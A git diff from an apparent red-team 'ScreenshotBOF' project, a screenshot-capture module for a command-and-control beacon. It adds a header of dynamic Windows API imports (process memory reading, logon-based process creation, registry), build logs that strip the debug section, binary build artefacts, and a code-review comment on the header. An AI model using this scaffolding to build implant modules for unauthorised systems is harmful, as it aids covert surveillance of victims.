VOID WINAPI OLE32$CoUninitialize(); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(LPWSTR lpsz, LPIID lpiid); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitialize(LPVOID pvReserved); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstanceEx(REFCLSID, IUnknown*, DWORD, COSERVERINFO*, DWORD, MULTI_QI*); +DECLSPEC_IMPORT BSTR WINAPI OleAut32$SysAllocString(const OLECHAR*); +DECLSPEC_IMPORT LPVOID WINAPI OLEAUT32$VariantInit(VARIANTARG* pvarg); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE* asAuthSvc, void* pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void* pAuthList, DWORD dwCapabilities, void* pReserved3); + +/* Registry */ +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult); +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegDeleteTreeA(HKEY hKey, LPCSTR lpSubKey); +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired, + CONST LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition); +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, + CONST BYTE* lpData, DWORD cbData); + + +/* FileSystem */ +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); +DECLSPEC_IMPORT DWORD WINAPI KERNEL32$SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFilePointerEx(HANDLE hFile, LARGE_INTEGER liDistanceToMove, PLARGE_INTEGER lpDistanceToMoveHigh, DWORD dwMoveMethod); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD 
nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetFileSizeEx(HANDLE hFile, PLARGE_INTEGER lpFileSize); +DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeW(LPCWSTR lptstrFilenamea, LPDWORD lpdwHandle); +DECLSPEC_IMPORT BOOL WINAPI VERSION$GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData); +DECLSPEC_IMPORT BOOL WINAPI VERSION$VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID* lplpBuffer, PUINT puLen); + + +/* Memory */ +DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID); +DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); +DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t); +DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t); + + +/* Process */ +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); +DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation); +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetProcessHeap(); +DECLSPEC_IMPORT SIZE_T WINAPI KERNEL32$VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); +DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE Process); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesRead); +DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD dwMilliseconds); +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID); 
+DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); +DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExW(HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize); + + +/* GetLast Error */ +DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(VOID); + + +/* Directories */ +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$RemoveDirectoryA(LPCSTR); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateDirectoryA(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName); +DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathIsDirectoryA(LPCSTR); +DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathFileExistsA(LPCSTR pszPath); + + +/* strings */ +DECLSPEC_IMPORT PSTR WINAPI SHLWAPI$StrChrA(PCSTR pszStart, WORD wMatch); +DECLSPEC_IMPORT LPSTR __cdecl MSVCRT$strchr(LPSTR, int); +DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcat_s(LPSTR, size_t, LPCSTR); +DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcpy_s(LPSTR, size_t, LPCSTR); +DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strncpy_s(LPSTR, size_t, LPCSTR, size_t); +DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(LPSTR, size_t, LPCSTR, ...); +DECLSPEC_IMPORT void WINAPI MSVCRT$sprintf(char*, char[], ...); +DECLSPEC_IMPORT int __cdecl MSVCRT$_vsnprintf(LPSTR, size_t, LPCSTR, va_list); +DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(LPCWSTR); +DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2); +DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpyA(LPSTR lpString1, LPCSTR lpString2); +DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcatA(LPSTR lpString1, LPCSTR lpString2); +DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpynA(LPSTR lpString1, LPCSTR lpString2, int iMaxLength); +DECLSPEC_IMPORT int WINAPI KERNEL32$lstrlenW(LPCWSTR lpString); +DECLSPEC_IMPORT LPWSTR WINAPI KERNEL32$lstrcpyW(LPWSTR lpString1, LPCWSTR lpString2); + + +/* RPC */ +DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY 
Rpcrt4$RpcStringFreeA(RPC_CSTR* String); +DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidCreate(UUID* Uuid); +DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidToStringA(const UUID* Uuid, RPC_CSTR* StringUuid); + + +/* Random */ +DECLSPEC_IMPORT void WINAPI MSVCRT$srand(int initial); +DECLSPEC_IMPORT int WINAPI MSVCRT$rand(); + + +/* DateTime */ +DECLSPEC_IMPORT time_t WINAPI MSVCRT$time(time_t* time); + + +/* SystemInfo */ +DECLSPEC_IMPORT void WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$IsProcessorFeaturePresent(DWORD ProcessorFeature); +DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetUserNameW(LPWSTR lpBuffer, LPDWORD pcbBuffer); + + + + + + +#ifdef __cplusplus +} +#endif + + +/* helper macros */ + +#define malloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) /* trustedsec */ +#define free(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, (LPVOID)addr) /* trustedsec */ +#define ZeroMemory(address, size) memset(address, 0, size); + + +/* ----------------------------------- DEFINITIONS ------------------------------------------*/ + +/* COM */ +#define CLSIDFromString OLE32$CLSIDFromString +#define CoCreateInstance OLE32$CoCreateInstance +#define CoInitializeEx OLE32$CoInitializeEx +#define CoUninitialize OLE32$CoUninitialize +#define IIDFromString OLE32$IIDFromString +#define CoInitialize OLE32$CoInitialize +#define CoCreateInstanceEx OLE32$CoCreateInstanceEx +#define SysAllocString OleAut32$SysAllocString +#define VariantInit OLEAUT32$VariantInit +#define CoInitialize OLE32$CoInitialize +#define CoInitializeSecurity OLE32$CoInitializeSecurity + +/* memory */ +#define HeapFree KERNEL32$HeapFree +#define HeapAlloc KERNEL32$HeapAlloc +#define HeapReAlloc KERNEL32$HeapReAlloc +#define memcpy MSVCRT$memcpy +#define memset MSVCRT$memset + + +/* process */ +#define GetProcessHeap KERNEL32$GetProcessHeap +#define CreateProcessWithLogonW ADVAPI32$CreateProcessWithLogonW +#define OpenProcess 
KERNEL32$OpenProcess +#define VirtualQueryEx KERNEL32$VirtualQueryEx +#define GetProcessId KERNEL32$GetProcessId +#define ReadProcessMemory KERNEL32$ReadProcessMemory +#define GetCurrentProcess KERNEL32$GetCurrentProcess +#define Sleep KERNEL32$Sleep +#define LookupPrivilegeValueW ADVAPI32$LookupPrivilegeValueW +#define GetModuleFileNameExW PSAPI$GetModuleFileNameExW + + +/* debug */ +#define EnumerateLoadedModulesW64 DBGHELP$EnumerateLoadedModulesW64 +#define SymInitializeW DBGHELP$SymInitializeW +#define SymCleanup DBGHELP$SymCleanup + + +/* filesystem */ +#define CreateFileA KERNEL32$CreateFileA +#define SetFilePointer KERNEL32$SetFilePointer +#define SetFilePointerEx KERNEL32$SetFilePointerEx +#define WriteFile KERNEL32$WriteFile +#define GetFileSizeEx KERNEL32$GetFileSizeEx +#define GetFileVersionInfoSizeW VERSION$GetFileVersionInfoSizeW +#define GetFileVersionInfoW VERSION$GetFileVersionInfoW +#define VerQueryValueW VERSION$VerQueryValueW + +/* error */ +#define GetLastError KERNEL32$GetLastError + + +/* registry */ +#define RegOpenKeyExA ADVAPI32$RegOpenKeyExA +#define RegDeleteTreeA ADVAPI32$RegDeleteTreeA +#define RegCreateKeyExA ADVAPI32$RegCreateKeyExA +#define RegSetValueExA ADVAPI32$RegSetValueExA + + +/* directory */ +#define RemoveDirectoryA KERNEL32$RemoveDirectoryA +#define CreateDirectoryA KERNEL32$CreateDirectoryA +#define MoveFileA KERNEL32$MoveFileA +#define PathIsDirectoryA SHLWAPI$PathIsDirectoryA +#define PathFileExistsA SHLWAPI$PathFileExistsA + + +/* strings */ +#define strchr MSVCRT$strchr +#define strcat_s MSVCRT$strcat_s +#define strcpy_s MSVCRT$strcpy_s +#define strncpy_s MSVCRT$strncpy_s +#define snprintf MSVCRT$_snprintf /*beacon can't find snprintf without the preceeding '_' */ +#define wcslen MSVCRT$wcslen +#define vsnprintf MSVCRT$vsnprintf +#define lstrlenW KERNEL32$lstrlenW +#define lstrcpyW KERNEL32$lstrcpyW +#define strcmp MSVCRT$strcmp +#define lstrcpyA Kernel32$lstrcpyA +#define lstrcatA Kernel32$lstrcatA +#define lstrcpynA 
Kernel32$lstrcpynA +#define lstrlenW KERNEL32$lstrlenW +#define lstrcpyW KERNEL32$lstrcpyW +#define sprintf MSVCRT$sprintf + + +/* RPC */ +#define RpcStringFreeA Rpcrt4$RpcStringFreeA +#define UuidCreate Rpcrt4$UuidCreate +#define UuidToStringA Rpcrt4$UuidToStringA + + +/* Random */ +#define srand MSVCRT$srand +#define rand MSVCRT$rand + + +/* DateTime */ +#define time MSVCRT$time + + +/* SystemInfo */ +#define GetSystemInfo KERNEL32$GetSystemInfo +#define GetUserNameW ADVAPI32$GetUserNameW +#define IsProcessorFeaturePresent KERNEL32$IsProcessorFeaturePresent + +#else + +#endif diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log new file mode 100644 index 0000000..a901931 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log 
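Review bot: `#define vsnprintf MSVCRT$vsnprintf` maps to a symbol this header never declares (the prototype is `MSVCRT$_vsnprintf`), and the `EnumerateLoadedModulesW64`/`SymInitializeW`/`SymCleanup` macros likewise point at `DBGHELP$...` names with no declaration, so any future use fails to compile instead of resolving through Beacon's loader; either add the prototypes or drop the macros. `MSVCRT$srand`, `MSVCRT$rand` and `MSVCRT$time` are declared `WINAPI` (`__stdcall`) although the CRT exports are `__cdecl`; that is harmless on x64 but on the x86 object this commit ships a caller would expect the callee to pop its arguments — declare them `__cdecl` like the neighbouring `MSVCRT$_snprintf`. `#define ZeroMemory(address, size) memset(address, 0, size);` redefines the Windows macro (the committed build log reports warning C4005) and its trailing semicolon breaks `if (c) ZeroMemory(p, n); else ...`; drop the `;`. Most of the header (COM, registry, `CreateProcessWithLogonW`, `ReadProcessMemory`, RPC, ...) is unreferenced by `Source.cpp`; unreferenced `DECLSPEC_IMPORT` declarations do not end up in the object, but trimming the file to the `User32$`/`GDI32$`/`KERNEL32$` calls the BOF actually makes keeps its dynamic-import surface easy to audit.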
@@ -0,0 +1,23 @@ + Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x64 + Copyright (C) Microsoft Corporation. All rights reserved. + + cl /c /D BOF /GS- /Fo"intermediary\BOF\x64\\" /TP /c /Fo"intermediary\BOF\x64\source" Source.cpp +cl : Command line warning D9025: overriding '/Fointermediary\BOF\x64\' with '/Fointermediary\BOF\x64\source' + + Source.cpp +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition + C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory' + 
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj + 1 File(s) copied + enumerating sections... + found debug section.. zeroing it... + closing stream... + done! 
diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog new file mode 100644 index 0000000000000000000000000000000000000000..4c0ca66ae1d3b0756ea26dea9d35c30a5ed985a7 GIT binary patch literal 622 zcmds!y9&Zk5JaaI{0FgD8?ms9Nqm4BNqoXZ5w);T!3XHit7j7h8^Kxvv%7cZ&Q6lY zeJ)>hIgOMkR17-mP;GhY(+7$)q3cpTCgVMg(M-7+YJj!_XIh^cq|5@1d4-&N+;!+i zYS491IT#;4O!dR8Kn5_jg~I#4M3VD$dCUyP(hBcxpI8VO zn4aNuRdxM!b@T5(f2V%>Gi}p4Ez>a7dfn=MmF`k6&2&6S^R&^?RPQ}~;(RaNtIdP1 z9HxcZj&+WDsN@t<#N;#%i_InZC{s^ZBKIYp%QObbg+0-#Ghq z=jQsAI^#Om>q3v8(@#30ha3I&?72VmVwC%Ilkttyliv3|Sqe#=KhM+-yz!ad-KynU z*RIlerpvPR8w*`E*A=zeROw7@$7(s$^=Ii9QS3ThrC)WwD${|s-1%1bIulLD`n1k? z&UCcW@j&0r)&5iZEnTF~I)cWP9&7#fSZyBl-Mzlu>UgflR9ABU<@2`}>38A$l>W%C zpLLfD-D@jaLyc{wJ--#$wtBzP72DkEGF|GZuY0c5`dnzHdb~~1rOfemo|m zpRqC&bsKCw$?Z7H8FDfeRUJ_-gu5?p^d#>wDm>9HMcIj-yrQ@26RBB#%pOX5=wLMP zY4YLMBQ#l^bsM_461P4|&z4!Qf0W)}h0wZKTXYx4=zeVdN9p6edK2~@>vf8i@Ec!P z=YjfFOJ|?fr>^yUk2OAK`GVeF$l&7a#cROQdEr~iTNrBm!P`1x9c6#(6p8&_+&zwQ z_ky{9vJLyui1E7}rF4*aAO6jr+HR6MkO#IC{g6{PtnKJvW+0F2>ebRFL-|auBbMw4S)7$#2gSMErQaxLC5Y=BZ1R3& zwC%9(xFEKwdV29S^sS@j zxO=9Q6ECTS@zWVpy)ggD=tRamuvbL0w`=DM9TaPWJf+4VaM5f_Y9z*Ph@{1@*gyo}M z+K9^Mj)IpPQE8LwEB!b~WiIu(QRR!>aN;H-GOCTD=Cz6DoiH|@CUbdc6EDrzuFa)V z80`nQM=x5>!=@d21-?iRWfECji0@>;R+0cb2F8&GUBkDcYCY;IoitE)#w03wpd2|K z7y31Hd&>Ov8rwm!k^Fm?=pzs{Yf4IwfUbP4_7&4bA;uy9|6E7q5{(Dy0#2sSQA*<%z zyV@(TkdkA997qcU_~r?zO+1bQT1~zBz|*g zTw!~nHq!}9B}?OiXR6Wf;_*$jPM6h$WG-0W;6WqSIk)o`Zm6)tl?|=>ivFBDb-2fh z_P#YL7q4z1&D2va4jUY6jNEwXmGf|nO__6u9T3>%f|c<;^C2^3_b>CV2xTjPx*kiN zGp42W`Y}ucaq!gD=ie@dc^jEa)mw0ICcRZY_jrt2O%+6WpZFL$R#!#!Na-;U9y=IW zkJi-Yd7z5%MD12>u=={4SHoJP=}Xh8D_i6ssiR??ZE0j}YOz+7%KGw|_b$C|#6uTk zK`(L(UWlllbn<6HC$RFDoGDcQXK^K%6kw&rI@*N z$stjL`6bt3Qk&$#vB;4&`oP75V5G6L3e^Ox_M!H%JiQuJ(2N*k;IP{sA%`4}9Sq(liGDjuFs?ww?lI*hf_ZK->k~bhzio7q2eQ!J%sx9jth@!TeIT19Smz1;aA#i!nik(%b(w;sQ zIpOO%(Fl*DRyA+PmCH^A)GR!RbLHdAh*7$u&O^GJichMrPu)T5+vPEWPGMK7teeW$ 
z<#lreQT0p|FqSp;s?m#o8t{-Sawrcbz9zn}OLb7J`Pqp&SQMfm2amjocOyn4KUZFg y8cc6RXx=FIl!Vv#4(u&)sLh&nIsAvl|MkCK;{RYGu0NFJkI_G}DZ#^LRQw0r61v#{ literal 0 HcmV?d00001 diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog new file mode 100644 index 0000000000000000000000000000000000000000..80fe074978a23ace5b19924a5f63bddc54eda9ae GIT binary patch literal 498 zcmdsz!3x4K5Cz{^@K-#E2X8Tn7^$YDtyT#3|9_%(5)ixyo~5w6>AWQEyymB@_R1R6 z$tzJaz1K-bS7xWEJ5xh9tO_@}kr~A2Fa=T>V&T5> zj=LhKOz^1V7y28E+>+{dZKy5JS}Uf1`NM$E9&1S#s>5dS{J`1U�ZY)#0a$2tQXB E3nAo7dH?_b literal 0 HcmV?d00001 diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate new file mode 100644 index 0000000..574e8b2 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate @@ -0,0 +1,2 @@ +PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0: +BOF|x64|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\| diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.vcxproj.FileListAbsolute.txt b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log new file mode 100644 index 0000000..4e915dc --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log 
@@ -0,0 +1,5 @@ +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\source.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x64.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.command.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.read.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.write.1.tlog diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe new file mode 100644 index 0000000..784a6a3 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe @@ -0,0 +1,7 @@ + + + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx64 + + + + \ No newline at end of file 
diff --git a/ScreenshotBOF/intermediary/BOF/x64/source.obj b/ScreenshotBOF/intermediary/BOF/x64/source.obj new file mode 100644 index 0000000000000000000000000000000000000000..bb9578aa39c2ebefb616337885456f2895070765 GIT binary patch literal 5239 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 literal 0 HcmV?d00001 
